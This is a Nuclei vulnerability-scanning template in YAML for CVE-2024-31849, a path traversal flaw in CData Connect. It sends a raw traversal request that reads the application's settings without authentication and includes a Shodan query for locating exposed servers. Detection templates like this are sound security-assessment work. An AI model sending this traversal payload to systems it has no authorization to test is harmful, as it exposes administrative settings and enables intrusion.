63 lines
1.7 KiB
YAML
63 lines
1.7 KiB
YAML
id: CVE-2024-31849
|
|
|
|
info:
|
|
name: CData Connect < 23.4.8846 - Path Traversal
|
|
author: DhiyaneshDK
|
|
severity: critical
|
|
description: |
|
|
A path traversal vulnerability exists in the Java version of CData Connect < 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
|
|
reference:
|
|
- https://www.tenable.com/security/research/tra-2024-09
|
|
- https://www.cdata.com/kb/entries/jetty-cve-0324.rst
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-31849
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2024-31849
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00044
|
|
epss-percentile: 0.09652
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: title:"CData Connect"
|
|
tags: cve,cve2024,cdata,lfi
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/login.rst'
|
|
|
|
matchers:
|
|
- type: word
|
|
internal: true
|
|
words:
|
|
- 'CData - Connect'
|
|
|
|
- raw:
|
|
- |
|
|
GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Referer: {{RootURL}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"items":[{'
|
|
- ':"true"'
|
|
- 'notifyemail'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'application/json'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502206306def4e2e9bd849a9223859d49dc3876b05ac689c4018361bce890427600d7022100f74718e6db0689ac6ce5206fc0b57545354477d87c84d0b8c6d3a3ff7524fdce:922c64590222798bb761d5b6d8e72950 |